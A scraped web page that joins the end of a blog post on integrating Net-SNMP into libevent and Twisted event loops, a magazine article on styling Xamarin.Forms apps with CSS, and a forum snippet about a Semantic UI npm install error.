div tag (from the official semantic-ui.com documentation portal) with the corresponding semantic tags like
ul &
li in the sample codepen above and I'm seeing styling, alignment issues.
Any idea whats going on / whats wrong?
ui listto the
<ul>tag, it should still work. The framework decided not to directly patch _any_ul or other already existing semantic tag like button to make sure it is still compatible with possible other used libraries or own styles. Yes, you still have to add
ui listor
ui buttonfor now, but thats makes it independent of other styles. Kind of namespace.
ultogether with
menuwhich isnt semantically correct either and not directly supported
@lubber-de I tried removing the
menu from the
ul tag's class thus replacing
ul tag's class with
'ui list' but now I'm getting the usual bullets for the following code:
<ul class="ui list">
<li class="item"></li>
<li class="item"></li>
</ul>
like we get with vanilla / browser-default css.
So do you mean, to use semantic-ui one needs to use less of semantic HTML tags and use more of
div tag ? | https://gitter.im/Semantic-Org/Semantic-UI?at=5db69ef22f8a034357ee7842 | CC-MAIN-2020-05 | en | refinedweb |
Discuss internals of a ConcurrentHashmap (CHM) in Java
Carvia Tech | May 25, 2019 | 4 min read | 1,251 views | Multithreading and Concurrency
In Java 1.7, A ConcurrentHashMap is a hashmap supporting full concurrency of retrieval via volatile reads of segments and tables without locking, and adjustable expected concurrency for updates. All the operations in this class are thread-safe, although the retrieval operations does not depend on locking mechanism (non-blocking). And there is not any support for locking the entire table, in a way that prevents all access. The allowed concurrency among update operations is guided by the optional concurrencyLevel constructor argument (default is16), which is used as a hint for internal sizing.
ConcurrentHashMap is similar in implementation to that of HashMap, with resizable array of hash buckets, each consisting of List of HashEntry elements. Instead of a single collection lock, ConcurrentHashMap uses a fixed pool of locks that form a partition over the collection of buckets.
HashEntry class takes advantage of final and volatile variables to reflect the changes to other threads without acquiring the expensive lock for read operations.
The table inside ConcurrentHashMap is divided among Segments (which extends Reentrant Lock), each of which itself is a concurrently readable hash table. Each segment requires uses single lock to consistently update its elements flushing all the changes to main memory.
put() method holds the bucket lock for the duration of its execution and doesn’t necessarily block other threads from calling get() operations on the map. It firstly searches the appropriate hash chain for the given key and if found, then it simply updates the volatile value field. Otherwise it creates a new HashEntry object and inserts it at the head of the list.
Iterator returned by the ConcurrentHashMap is fail-safe but weakly consistent. keySet().iterator() returns the iterator for the set of hash keys backed by the original map. The iterator is a “weakly consistent” iterator that will never throw ConcurrentModificationException, and guarantees to traverse elements as they existed upon construction of the iterator, and may (but is not guaranteed to) reflect any modifications subsequent to construction.
Re-sizing happens dynamically inside the map whenever required in order to maintain an upper bound on hash collision. Increase in number of buckets leads to rehashing the existing values. This is achieved by recursively acquiring lock over each bucket and then rehashing the elements from each bucket to new larger hash table.
Important facts about ConcurrentHashMap
Frequent Questions
Is this possible for 2 threads to update the ConcurrentHashMap at the same moment?
Yes, its possible to have 2 parallel threads writing to the CHM at the same time, infact in the default implementation of CHM, atmost 16 threads can write & read in parallel. But in worst case if the two objects lie in the same segment, then parallel write would not be possible.
Can multiple threads read from a given Hashtable concurrently?
No, get() method of hash table is synchronized (even for synchronized HashMap). So only one thread can get value from it at any given point in time. Full concurrency for reads is possible only in ConcurrentHashMap via the use of volatile.
What is difference between size and capacity of HashMap/ArrayList
Size defines the actual number of elements contained in the collection, while capacity at any given point in time defines the number of items that a collection can hold without growing itself.
What is Load Factor in HashMap Context?
The load factor is a measure of how full the hash table is allowed to get before its capacity is automatically increased. Default initial capacity of the HashMap takes is 16 and load factor is 0.75f (i.e 75% of current map size). The load factor represents at what level the HashMap capacity should be doubled.
By what amount ConcurrentHashMap/hashMap grows when its capacity is reached?
Whenever threshold (defined by load factor with default value of 0.75) of HashMap reached, it increases its size to double. Signed Left shift operator is used to double the capacity of hashmap, as shown in code below
newCap = oldCap << 1
Which is same as
newCap = oldCap x 2^1 = oldCap x 2
Why HashMap capacity is always expressed in power of 2?
HashMap always maintains its internal capacity in power of 2s, if you supply a different initial capacity then it will automatically round it nearest power of two using the below code.
/** * Returns a power of two size for the given target capacity. */ static final int tableSizeFor(int cap) { int n = cap - 1; n |= n >>> 1; n |= n >>> 2; n |= n >>> 4; n |= n >>> 8; n |= n >>> 16; return (n < 0) ? 1 : (n >= MAXIMUM_CAPACITY) ? MAXIMUM_CAPACITY : n + 1; }
This is done to make get(key) calls faster by utilizing the below bitwise hack to calculate appropriate bucket location for a given key. We know that modulo of power of two can be expressed in terms of below bitwise operation. Please note that modulus operator (%) is around 10x slower than the below bitwise hack, which matters for a function like HashMap’s get(key)
x % 2 inpower n == x & (2 inpower n - 1).
for example,
x % 2 == x & 1 x % 4 == x & 3 x % 8 == x & 7
But to utilize the above performance tweak, x must be power of 2. Thus HashMap’s internal capacity is always in power of 2.
Multithreading and Concurrency:
- What is AtomicInteger class and how it works internally
-?
- How will you handle ConcurrentModificationException in Java
Top articles in this category:
- Diamond Problem of Inheritance in Java 8
- How will you calculate factorial of a large number in Java
- What do you understand by Java Memory Model?
- What are four principles of OOP, How aggregation is different than Composition?
- What is volatile keyword in Java
- Is Java Pure Object Oriented Language?
- Difference between HashMap and ConcurrentHashMap. | https://www.javacodemonk.com/discuss-internals-of-a-concurrenthashmap-chm-in-java-b537d34e | CC-MAIN-2020-05 | en | refinedweb |
Scene organization¶
This article covers topics related to the effective organization of scene content. Which nodes should one use? Where should one place them? How should they interact?
How to build relationships effectively¶
When Godot users begin crafting their own scenes, they often run into the following problem:
They create their first scene and fill it with content before the creeping sense that they need to split it up into re-usable pieces haunts them. They save branches of their scene into their own scene. However, they then notice that the hard references they were able to rely on before are no longer possible. Re-using the scene in multiple places creates issues because the node paths do not find their targets. Signal connections established in the editor break.
To fix these problems, one must instantiate the sub-scenes without them requiring details about their environment. One needs to be able to trust that the sub-scene will create itself without being picky about how one uses it.
One of the biggest things to consider in OOP is maintaining focused, singular-purpose classes with loose coupling to other parts of the codebase. This keeps the size of objects small (for maintainability) and improves their reusability so that re-writing completed logic is unnecessary.
These OOP best practices have several ramifications for the best practices in scene structure and script usage.
If at all possible, one should design scenes to have no dependencies. That is, one should create scenes that keep everything they need within themselves.
If a scene must interact with an external context, experienced developers recommend the use of Dependency Injection. This technique involves having a high-level API provide the dependencies of the low-level API. Why do this? Because classes which rely on their external environment can inadvertently trigger bugs and unexpected behavior.
To do this, one must expose data and then rely on a parent context to initialize it:
Connect to a signal. Extremely safe, but should use only to “respond” to behavior, not start it. Note that signal names are usually past-tense verbs like “entered”, “skill_activated”, or “item_collected”.
# Parent $Child.connect("signal_name", object_with_method, "method_on_the_object") # Child emit_signal("signal_name") # Triggers parent-defined behavior.
// Parent GetNode("Child").Connect("SignalName", ObjectWithMethod, "MethodOnTheObject"); // Child EmitSignal("SignalName"); // Triggers parent-defined behavior.
Call a method. Used to start behavior.
# Parent $Child.method_name = "do" # Child, assuming it has String property 'method_name' and method 'do'. call(method_name) # Call parent-defined method (which child must own).
// Parent GetNode("Child").Set("MethodName", "Do"); // Child Call(MethodName); // Call parent-defined method (which child must own).
Initialize a FuncRef property. Safer than a method as ownership of the method is unnecessary. Used to start behavior.
# Parent $Child.func_property = funcref(object_with_method, "method_on_the_object") # Child func_property.call_func() # Call parent-defined method (can come from anywhere).
// Parent GetNode("Child").Set("FuncProperty", GD.FuncRef(ObjectWithMethod, "MethodOnTheObject")); // Child FuncProperty.CallFunc(); // Call parent-defined method (can come from anywhere).
Initialize a Node or other Object reference.
# Parent $Child.target = self # Child print(target) # Use parent-defined node.
// Parent GetNode("Child").Set("Target", this); // Child GD.Print(Target); // Use parent-defined node.
Initialize a NodePath.
# Parent $Child.target_path = ".." # Child get_node(target_path) # Use parent-defined NodePath.
// Parent GetNode("Child").Set("TargetPath", NodePath("..")); // Child GetNode(TargetPath); // Use parent-defined NodePath.
These options hide the source of accesses from the child node. This in turn keeps the child loosely coupled to its environment. One can re-use it in another context without any extra changes to its API.
Note
Although the examples above illustrate parent-child relationships, the same principles apply towards all object relations. Nodes which are siblings should only be aware of their hierarchies while an ancestor mediates their communications and references.
# Parent $Left.target = $Right.get_node("Receiver") # Left var target: Node func execute(): # Do something with 'target'. # Right func _init(): var receiver = Receiver.new() add_child(receiver)
// Parent GetNode<Left>("Left").Target = GetNode("Right/Receiver"); public class Left : Node { public Node Target = null; public void Execute() { // Do something with 'Target'. } } public class Right : Node { public Node Receiver = null; public Right() { Receiver = ResourceLoader.Load<Script>("Receiver.cs").New(); AddChild(Receiver); } }
The same principles also apply to non-Node objects that maintain dependencies on other objects. Whichever object actually owns the objects should manage the relationships between them.
Warning
One should favor keeping data in-house (internal to a scene) though as placing a dependency on an external context, even a loosely coupled one, still means that the node will expect something in its environment to be true. The project’s design philosophies should prevent this from happening. If not, the code’s inherent liabilities will force developers to use documentation to keep track of object relations on a microscopic scale; this is otherwise known as development hell. Writing code that relies on external documentation for one to use it safely is error-prone by default.
To avoid creating and maintaining such documentation, one converts the dependent node (“child” above) into a tool script that implements _get_configuration_warning(). Returning a non-empty string from it will make the Scene dock generate a warning icon with the string as a tooltip by the node. This is the same icon that appears for nodes such as the Area2D node when it has no child CollisionShape2D nodes defined. The editor then self-documents the scene through the script code. No content duplication via documentation is necessary.
A GUI like this can better inform project users of critical information about a Node. Does it have external dependencies? Have those dependencies been satisfied? Other programmers, and especially designers and writers, will need clear instructions in the messages telling them what to do to configure it.
So, why do all this complex switcharoo work? Well, because scenes operate best when they operate alone. If unable to work alone, then working with others anonymously (with minimal hard dependencies, i.e. loose coupling). If the inevitable changes made to a class cause it to interact with other scenes in unforeseen ways, then things break down. A change to one class could result in damaging effects to other classes.
Scripts and scenes, as extensions of engine classes should abide by all OOP principles. Examples include…
Choosing a node tree structure¶
So, a developer starts work on a game only to stop at the vast possibilities before them. They might know what they want to do, what systems they want to have, but where to put them all? Well, how one goes about making their game is always up to them. One can construct node trees in a myriad of ways. But, for those who are unsure, this helpful guide can give them a sample of a decent structure to start with.
A game should always have a sort of “entry point”; somewhere the developer can definitively track where things begin so that they can follow the logic as it continues elsewhere. This place also serves as a bird’s eye view to all of the other data and logic in the program. For traditional applications, this would be the “main” function. In this case, it would be a Main node.
- Node “Main” (main.gd)
The
main.gd script would then serve as the primary controller of one’s
game.
Then one has their actual in-game “World” (a 2D or 3D one). This can be a child of Main. In addition, one will need a primary GUI for their game that manages the various menus and widgets the project needs.
-
- Node “Main” (main.gd)
-
- Node2D/Spatial “World” (game_world.gd)
- Control “GUI” (gui.gd)
When changing levels, one can then swap out the children of the “World” node. Changing scenes manually gives users full control over how their game world transitions.
The next step is to consider what gameplay systems one’s project requires. If one has a system that…
- tracks all of its data internally
- should be globally accessible
- should exist in isolation
… then one should create an autoload ‘singleton’ node.
Note
For smaller games, a simpler alternative with less control would be to have a “Game” singleton that simply calls the SceneTree.change_scene() method to swap out the main scene’s content. This structure more or less keeps the “World” as the main game node.
Any GUI would need to also be a singleton, be transitory parts of the “World”, or be manually added as a direct child of the root. Otherwise, the GUI nodes would also delete themselves during scene transitions.
If one has systems that modify other systems’ data, one should define those as their own scripts or scenes rather than autoloads. For more information on the reasons, please see the ‘Autoloads vs. Internal Nodes’ documentation.
Each subsystem within one’s game should have its own section within the SceneTree. One should use parent-child relationships only in cases where nodes are effectively elements of their parents. Does removing the parent reasonably mean that one should also remove the children? If not, then it should have its own place in the hierarchy as a sibling or some other relation.
Note
In some cases, one needs these separated nodes to also position themselves
relative to each other. One can use the
RemoteTransform /
RemoteTransform2D nodes for this purpose.
They will allow a target node to conditionally inherit selected transform
elements from the Remote* node. To assign the
target
NodePath, use one of the following:
- A reliable third party, likely a parent node, to mediate the assignment.
- A group, to easily pull a reference to the desired node (assuming there will only ever be one of the targets).
When should one do this? Well, it’s up to them to decide. The dilemma arises when one must micro-manage when a node must move around the SceneTree to preserve itself. For example…
Add a “player” node to a “room”.
Need to change rooms, so one must delete the current room.
Before the room can be deleted, one must preserve and/or move the player.
Is memory a concern?
- If not, one can just create the two rooms, move the player and delete the old one. No problem.
If so, one will need to…
- Move the player somewhere else in the tree.
- Delete the room.
- Instantiate and add the new room.
- Re-add the player.
The issue is that the player here is a “special case”, one where the developers must know that they need to handle the player this way for the project. As such, the only way to reliably share this information as a team is to document it. Keeping implementation details in documentation however is dangerous. It’s a maintenance burden, strains code readability, and bloats the intellectual content of a project unnecessarily.
In a more complex game with larger assets, it can be a better idea to simply keep the player somewhere else in the SceneTree entirely. This involves…
- More consistency.
- No “special cases” that must be documented and maintained somewhere.
- No opportunity for errors to occur because these details are not accounted for.
In contrast, if one ever needs to have a child node that does not inherit the transform of their parent, one has the following options:
- The declarative solution: place a Node in between them. As nodes with no transform, Nodes will not pass along such information to their children.
- The imperative solution: Use the
set_as_toplevelsetter for the CanvasItem or Spatial node. This will make the node ignore its inherited transform.
Note
If building a networked game, keep in mind which nodes and gameplay systems are relevant to all players versus those just pertinent to the authoritative server. For example, users do not all need to have a copy of every players’ “PlayerController” logic. Instead, they need only their own. As such, keeping these in a separate branch from the “world” can help simplify the management of game connections and the like.
The key to scene organization is to consider the SceneTree in relational terms rather than spatial terms. Do the nodes need to be dependent on their parent’s existence? If not, then they can thrive all by themselves somewhere else. If so, then it stands to reason they should be children of that parent (and likely part of that parent’s scene if they aren’t already).
Does this mean nodes themselves are components? Not at all. Godot’s node trees form an aggregation relationship, not one of composition. But while one still has the flexibility to move nodes around, it is still best when such moves are unnecessary by default. | https://docs.godotengine.org/en/latest/getting_started/workflow/best_practices/scene_organization.html | CC-MAIN-2020-05 | en | refinedweb |
The.
Configuring the Arduino IDE
Thankfully, the Arduino engineers decided to keep all the features from the old Arduino core. That means that you can still use the classic Arduino IDE and program your new Arduino Nano like you always have.
To get started, connect the Arduino to your computer. The necessary drivers should be automatically installed. Once that’s done, open the Arduino IDE and navigate to “Tools”, then “Boards” and choose the “Boards Manager”. A new window will appear. In it, search for “Arduino Nano 33 BLE” and install the following package:
Install the package for your Arduino Nano 33 BLE.
Then, choose the newly installed board from the boards menu:
Choose your Nano 33 BLE from the Tools dropdown menu.
A Hello World Application with Nano 33 BLE
Let’s start with a simple application that’ll help us to determine whether the Mbed libraries were properly installed and are functioning as intended. The following code will simply output a square wave signal on the D5 pin of the Arduino Nano 33 BLE:
mbed_waiting.ino
As you can see, you can easily mix old Arduino functions with the new Mbed methods. The code doesn’t look like a lot, but if you’re able to compile and upload it to your Arduino, you’re ready to go. It’s also worth noting that, unlike the standard Arduino delay, the Mbed wait functions try to put the Arduino into a low-power mode.
The MBed API and Available Features
As I previously mentioned, you can access many features of the Mbed OS. Unfortunately, I was unable to find an official source that states what features are available.
If you take a look at the MBed API, you’ll find a few device-specific APIs (for example, storage and NFC). I think it’s obvious that those won’t work.
However, the platform and RTOS features are implemented and the USB, Drivers, and Bluetooth BLE libraries should work as well, but I haven’t tested them. But as stated above, you can mix the MBed features with the classic Arduino calls so it shouldn’t be hard to find a solution.
The Platform API
The following example uses the CircularBuffer from the MBed platform API:
mbed_circular_buffer.ino
The program simply writes ten values to a ring buffer and then prints the stored values.
Creating a Multithreaded Application
Now let’s take a look at the main feature of the new core: multi-threaded Arduino sketches. You can use the RTOS namespace to create, synchronize, and manage threads. The following example will spawn two threads that will modify a shared buffer. The synchronization is done by a semaphore.
The main thread will then read the buffer and print its contents to the console if it’s not empty:
thread-semaphores.ino
The writeBuffer method is executed by the two child-threads and, once started, will run forever. Each thread asks the semaphore for permission to write to the buffer before modifying it. If no other thread is using it, the access is granted and the thread writes its name to the buffer.
In the setup function, two child-threads are created and started. The loop method represents the third thread which will read the contents from the buffer and print it to the console:
As you can see, each name gets printed correctly and nothing gets overwritten by another thread. You can also observe that Bill appears more often. That’s perfectly normal as this is not handled by our application.
However, the RTOS namespace offers many more locking mechanisms that can be used to overcome this problem.
Utilizing the Mbed Core Features Takes Practice
The new Arduino Core offers many useful additions to the well-established platform, especially when it comes to multithreading and concurrent access control for shared resources. However, due to the nature of parallel computing, these features can be complicated to work with. | https://maker.pro/arduino/tutorial/how-to-use-mbed-rtos-features-on-the-arduino-nano-33-ble | CC-MAIN-2020-05 | en | refinedweb |
Java 8 Counting with Collectors tutorial explains, with examples, how to use the predefined
Collector returned by
java.util.Stream.Collectors class’
counting() method to count the number of elements in a
Stream. The tutorial starts off with the formal definition of the
Collectors.counting() method, then explains its working, and finally shows the method’s usage via a Java code example.
(Note – This tutorial assumes that you are familiar with basics of Java 8 CollectorsRead Tutorial explaining basics of Java 8 Collectors.)
Predefined
Collector returned by
Collectors.counting() method
Collectors.counting() method is defined with the following signature –
public static <T> Collector<T, ?, Long> counting()
Where,
– output is a
Collector, acting on a Stream of elements of type
T, with its finisherClick to Read tutorial on 4 components of Collectors incl. ‘finisher’ returning the ‘collected’ value of type
Long
The working of the counting collector is pretty straightforward. It is a terminal operationClick to Read Tutorial explaining intermediate & terminal Stream operations which returns the total count of elements in the stream which reach the
collect() method after undergoing various pipelinedClick to Read Tutorial explaining concept of Pipelines in Computing stream operations such as filtering, reduction etc.
It’s also worthwhile to know that internally the counting collector actually delegates the counting job to the ‘reducing collector’ with the call
reducing(0L, e -> 1L, Long::sum). But this call is internal to the implementation and need not be taken into consideration before terminating your stream with the counting Collector.
Java 8 code example showing
Collector.counting() method’s usage
package com.javabrahman.java8.collector; import com.javabrahman.java8.Employee; import java.util.Arrays; import java.util.List; import java.util.stream.Collectors; public class CountingWithCollectors { static List<Employee> employeeList = Arrays.asList(new Employee("Tom Jones", 45), new Employee("Harry Major", 25), new Employee("Ethan Hardy", 65), new Employee("Nancy Smith", 22), new Employee("Deborah Sprightly", 29)); public static void main(String args[]){ Long count=employeeList.stream().collect(Collectors.counting()); System.out.println("Employee count: "+count); } } /; } //Standard equals() and hashcode() implementations go here }
Employee.javais the POJO class i.e. the type of which the Stream is created.
CountingWithCollectorsclass contains a static list of 5
Employeeobjects named
employeeList.
- In the
main()method of
CountingWithCollectorsclass a stream of
Employeeobjects is created by invoking
employeeList.stream(). This stream is then terminated by invoking the
collect()method with the
Collectorreturned by the
Collectors.counting()method passed as a parameter.
- As expected, the Stream terminates and the counting
Collectorreturns the count of the stream elements(employees) as a
Longvalue.
- Lastly, the employee count is printed and is
5as expected.
Summary
In this tutorial we understood the working of the predefined
Collector returned by the
Collectors.counting() method. We looked at the formal definition of the
Collectors.counting() method, had a brief look at what actually happens inside the method, and finally saw the
Collectors.counting() method in action with a Java 8 code example<< | https://www.javabrahman.com/java-8/java-8-counting-with-collectors-collectors-counting-method-tutorial-with-examples/ | CC-MAIN-2018-34 | en | refinedweb |
SOAtest 9.0---> WIN32COM.CLIENT
No module found for WIN32COM ERRORHi all,
I am currently writing a Jython code where i am needing WINCOM32 Extensible Package .I am dispatching Excel using this.
from win32com.client import Dispatch
But when i am running the code , it says the above WIN32COM module is not found.
Solution we used but not Successfull:
We installed Python 2.2.2 version and also the Extensible package of WIN32COM.
But still the same issue is happening.
Possible Reason that we think:
We somehow have to map and import this jar file and Phython in SOATest explicitly so that SOA Test starts recognising this jar file.
But somehow we are clueless as to how we should proceed.
Can anyone please pitch in and do the needfull.
Any form of help wil be much appreciated.
Version:
SOATEST-- 9.0
Jython ----- 2.2.1
Python msi---2.2.2
Thanks
Gyan
0
JAR files are included on the system class path by clicking Parasoft > Preferences, Parasoft > SOAtest > System Properties. Then clicking Add JARs.... .
However generally modules from python or jython are used in SOAtest for use in the extension tool by specifying the jython path and home (more info on this by clicking Help > Help Contents, then navigate to Parasoft SOAtest User's Guide > Reference > Extensibility (Scripting) Basics, then navigate to the "Language Specific Tips". The current version of jython installed on SOAtest is version 2.2.1. , so in order to be consistent with this you will want to make sure that the version of jython/python that you download and use to create modules matches this. You can download 2.2.1 here:
To enable the ability of importing your jython modues into your jython scripts in SOAtest, go to Parasoft->Preferences->Parsoft->SOAtest->Scripting. Here you will be met with the option to specify your jython Home, which is the location of where you installed your jython and where your module resides. If you have additional modules which are not accessible from jython home, than you can add them to the Jython Path. If you have them in multiple locations, then you can include multiple directories for your jython modules by typing "c:\folder1;c:\folder2". It makes no difference whether you download and use jython 2.2.1 or python 2.2.1, since jython is a java enabled version of python.
Regards,
Jon
As you suggested in earlier post, we have used Apache POI packages to read/write Excel sheets. This worked absolutely fine.
Hi
I am getting the import error for soaptest.api and com.parasoft.api
ImportError: No module named soaptest.api
Running this from Linux ,SOA Test 9.8 version.
could any one guide , do i need to install python version separately, however i believe SOA test has default python which can import these modules.
Same import works fine in Windows 9.8 SOAtest and not in Linux.
thank you | https://forums.parasoft.com/discussion/2424/soatest-9-0-win32com-client | CC-MAIN-2018-34 | en | refinedweb |
Introduction to IR Sensors
Infrared (IR) light is invisible electromagnetic radiation. Everything absorbs and emits IR, and it's utilised in a plethora of applications. You may have heard of IR used in night vision equipment. This is becuase, in low visible-light conditions, everything still emits IR radiation. The night vision equipment has IR sensors which detect and output this information!
IR sensors consist of a photocell & chip tuned to look out for specific wavelenghts of invisible infrared light. This is why IR is used for remote control detection, such as your TV. You "could" use visible light, however you would be essentially shining a torch at you TV, which isn't ideal.
So, in order to use IR for remote sensing, you need an IR LED (in the remote to output the IR signal) coupled with an IR sensor (inside the TV) which detects the IR pulses and follows the direction that these pulses are coded to e.g. turn off, change channel etc.
In this tutorial we're going to test an IR sensor and then hook it up to our Raspberry Pi and programme a remote to interact with it!
Testing the IR Sensor
You will need:
- IR Sensor
- LED (visible light)
- 200 – 1000 ohm resistor
- 4x AA batteries
IR Sensors contain a semiconductor/chip inside them, so they need to be powered in some way (always check the datasheet for your specific receiver) before they can be tested. In this case, the sensor can be powered by 3.3V
Connect up the sensor like so:
-.
Now grab any remote control (TV, BluRay etc…) and point it at the detector. While pressing some buttons, you should see the LED blink a few times!
That's it - your receiver is working. . . . !
Attaching IR Sensor to the Raspberry Pi
Now that we're happy our reciever is working, we're going to hook it up to our Raspberry Pi, and configure it with a remote control for use with RaspBMC Media Center!
- Pin 1 is DATA, goes to RPi pin 12 (GPIO 18);
- Pin 2 is GND, goes to RPI pin 6 (GROUND)
- Pin 3 is POWER, goes RPi pin 1 (3v3)
If you have different sensor you may have different pinout. Check the datasheet for you sensor.
Testing the IR Sensor on the Rasberry Pi
To check if the IR Sensor is working on the Pi, simply run the following commands one after each other:
sudo modprobe lirc_rpi
then
sudo kill $(pidof lircd)
(if you get a usage list come up, don't worry, it just means that lircd wasn't running to begin with)
then
mode2 -d /dev/lirc0
Now, when you press buttons on your remote, assuming your receiver is connected correctly, you should see something resembling this appear on the screen with each press:
If nothing happens when you press buttons on your remote, please check the following:
1. Go back and test the IR Sensor using the LED method mentioned above
2. Make sure the IR Sensor has been connected to the Pi correctly
3. Make sure the remote is working (try a different remote if you have one, change the batteries etc...)
Setting up the remote control buttons
First thing to do, is to check that your remote doesnt already have a preset within raspbmc.
Login to raspbmc, go to Programs -> Raspbmc settings
Scroll across to the IR Remote Tab
Select the option enable GPIO TSOP IR Receiver
Below that, you should be able to select a bunch of different remotes. If yours is listed, then boom! Select it, then select OK at the bottom. Raspbmc should prompt you to restart.
After Raspbmc has restarted, you should be good to go.
If however, your remote isnt listed then you will need to record your remote.
Recording your remote
Before, going through this process, have a look here: and see if your remote has already had a lircd.conf created for it. If it has, then copy the lircd.conf file to your pi's home directory: /home/pi/lircd.conf and skip to step 3.
(If you find the lircd.conf you have downloaded has incorect KEY mappings, then you can record your own)
1. First thing to do is to get the list of KEY commands that are accepted.
To do this, run the following commands (rember to copy the list that you get and save it somewhere, as you'll need them later)
sudo kill $(pidof lircd)
irrecord --list-namespace | grep KEY
(if you get a usage list come up, don't worry, it just means that lircd wasn't running to begin with)
Once you have saved this list you are ready to record your remote.
2. To record your remote, run the following commands
sudo kill $(pidof lircd)
(if you get a usage list come up, don't worry, it just means that lircd wasn't running to begin with)
irrecord -d /dev/lirc0 ~: /home/pi/lircd.conf)
3. Login to Raspbmc, go to Programs -> Raspbmc settings
Scroll across to the IR Remote Tab
Now from the list of remotes, you'll want to select custom (lircd.conf on pi's home folder)
Then select OK and you should be prompted to restart.
After you restart you should have a working remote control!
14 Comments | https://www.modmypi.com/blog/tutorials/raspberry-pis-remotes-ir-receivers | CC-MAIN-2018-34 | en | refinedweb |
This tutorial covers the basic concepts of multithreading in Java. It begins with explaining what is multithreading, and then shows how to create your first threads in Java using two basic approaches – extending
Thread class and implementing
Runnable interface. Both approaches are explained with Java code examples showing thread creation and execution. Lastly, the tutorial explains the reasons why ‘implementing
Runnable’ approach for creating threads is preferred over ‘extending
Thread’ approach.
Conceptual basics of multithreading
(Note – You can skip the theory part in this section if you already understand basic concepts of multithreading; but I would recommend that you still give it a quick look!)
Usually when we talk of multi-programming we refer to multiple programs running on a processor. A program is a set of instructions which when executed provides a specific functionality. An example of a commonly used program is a word processor such as MS Word. From the operating system point-of-view executing instances of programs are individual processes with each process having its own memory address space allocated to it.
As a process runs, it might need to take care of multiple internal tasks in parallel in order to deliver the complete set of functionalities which it offers. For example, as a person types in the word processor, there are multiple tasks running in the background. One task is responsible for saving changes in the document in a recovery file. Another task checks for spelling and grammatical errors as the user types. Yet another task does the basic task of displaying what a user types in the editor and so on.
All the above mentioned tasks are internal to the word processor program, i.e. they share the same memory address space which has been allocated to the word processor by the operating system. At the same time these internal tasks need to execute together or in parallel to ensure the program’s functionalities are available to its users at the same time. Each of these parallel tasks are the smallest units of independent work carried out by program, and are instances of individual threads working to make the whole program work together.
To summarize the relation between programs, processes and threads. A program in execution is a process, and an executing process can have multiple threads running in parallel within it to accomplish multiple tasks that the process needs to carry out. The diagram below depicts the relationship between processes and threads.
Thread management classes in Java are all designed around management of parallel internal threads of work over their entire lifecycle – from creation to destruction. As we study basic and advanced features for multithreading in Java in this and upcoming tutorials in Java Concurrency series, we will cover all aspects related to defining, managing and optimizing threads.
To run a piece of functionality in parallel, you will need to first encapsulate it as a separate thread and then execute that thread. Let us now learn how to define and run individual thread instances as per our needs.
Creating and running a thread defined by extending Thread class
The first way of defining your own thread functionality involves sub-classing the
java.lang.Thread class. An instance of
Thread class holds a single thread of execution of a running program.
Creation of a new parallel thread using
Thread class involves the following 3 steps –
- Define a class which extends
Threadclass.
- Override the
run()method of
Threadclass, and write your custom thread logic in it.
- Invoke the
start()method on your custom
Threadsubclass to start the thread execution.
Let us now look at a code example showing thread creation by extending
Thread class, which is followed by detailed explanation of the code –
//FirstThread.java package com.javabrahman.corejava; public class FirstThread extends Thread{ @Override public void run(){ System.out.println("First thread ran"); } } //RunningThreads.java package com.javabrahman.corejava; public class RunningThreads { public static void main(String args[]){ Thread firstThread = new FirstThread(); firstThread.start(); } }
- Class
FirstThreadis extends
Thread. It overrides the method
run(), and provides a simple implementation which prints a single line string.
- In the
main()method of
RunningThreadsclass an instance of
FirstThread, named
firstThread, is created using its default constructor.
firstThread.start()method is then invoked which starts the execution of the code inside
run()method of
firstThreadin a parallel new thread.
- The newly created thread then executes and prints the line
"First thread ran"as output.
Creating and running a thread defined by implementing Runnable interface
The second way to create a parallel thread is by implementing
java.lang.Runnable interface. There are 4 steps involved in creating and running a separate thread using
Runnable –
- Define a class which implements
Runnableinterface.
- Override the
run()method of
Runnableinterface, and write your custom thread logic in it.
- Wrap the
Runnableinstance inside a new
Threadinstance. This is accomplished by using one of the multiple constructors provided by
Threadclass which accept the
Runnableinterface as parameter.
- Invoke the
start()method on the newly created
Threadinstance to start the thread execution.
Let us now see a Java code example showing how to create and run a separate custom thread by implementing
Runnable interface –
//SecondThread.java package com.javabrahman.corejava; public class SecondThread implements Runnable{ @Override public void run() { System.out.println("Second thread ran"); } } //RunningThreads.java package com.javabrahman.corejava; public class RunningThreads { public static void main(String args[]){ Thread secondThread = new Thread(new SecondThread()); secondThread.start(); } }
- Class
SecondThreadimplements
Runnableinterface. It overrides the abstract method
run()of
Runnable, and prints a single line string as part of its implementation.
- Class
RunningThreadscreates an instance of a
Threadby using its single parameter constructor which accepts a
Runnableinstance.
- A parallel thread of execution for the logic contained in
run()method of
SecondThreadis started by invoking the
start()method of
SecondThread.
- The parallel thread started and printed the string –
"Second thread ran"as its output.
Comparing the two approaches for thread creation
Implementing
Runnable interface is preferred over extending
Thread class due to the following reasons –
- Java allows extending only a single base class. But it allows implementing multiple interfaces. So, if you extend
Thread, you cannot subclass any other class. But when you implement
Runnableyou can potentially extend another class when required.
- When a thread is implemented by extending
Threadclass then each thread instance created has a unique object associated with it. On the other hand, when you implement a thread by implementing
Runnable, and the same instance is used to create multiple
Threadinstances, then the same object is passed to different threads. So, if you create ‘n’ threads by using
extends Thread, you end up with ‘n’
Threadobjects. But when you create ‘n’ threads by using a single instance of class
implementing Runnable, you end up with only ‘1’
Runnableobject.
- From a design perspective, if you want to enhance the behavior of any class by overriding multiple of its methods, then you should extend it. So, if you need to enhance
Threadclass’ behavior by implementing methods other than
run()then only you should subclass
Thread, else implement
Runnable, and pass this instance of
Runnableto a
Threadto start your parallel thread.
- Implementing
Runnablegives you the option of executing your threads via the
Executerframework as it only accepts
Runnableinstances and not
Threadsubclasses.
Conclusion
In this tutorial we understood the conceptual basics of multithreading, and then learnt how to create and run threads using
Thread class and
Runnable interface with code examples. We also looked at the preferred way of creating threads and understood the reasons for the preference. In the next tutorial, i.e. 2nd partClick to Read Tutorial on Java Threads’ Lifecycle of Java Concurrency Series, we will go through the lifecycle of a thread, and understand thread state transitions.
| https://www.javabrahman.com/corejava/java-multithreading-basics-creating-and-running-threads-in-java-with-examples/ | CC-MAIN-2018-34 | en | refinedweb |
IDataServiceStreamProvider::ResolveType Method (String^, DataServiceOperationContext^)
Returns a namespace-qualified type name that represents the type that the data service runtime must create for the media link entry that is associated with the data stream for the media resource that is being inserted.
Assembly: System.Data.Services (in System.Data.Services.dll)
Parameters
- entitySetName
- Type: System::String^
Fully-qualified entity set name.
- operationContext
- Type: System.Data.Services::DataServiceOperationContext^
The DataServiceOperationContext instance that is used by the data service to process the request.
Return ValueType: System::String^
A namespace-qualified type name.
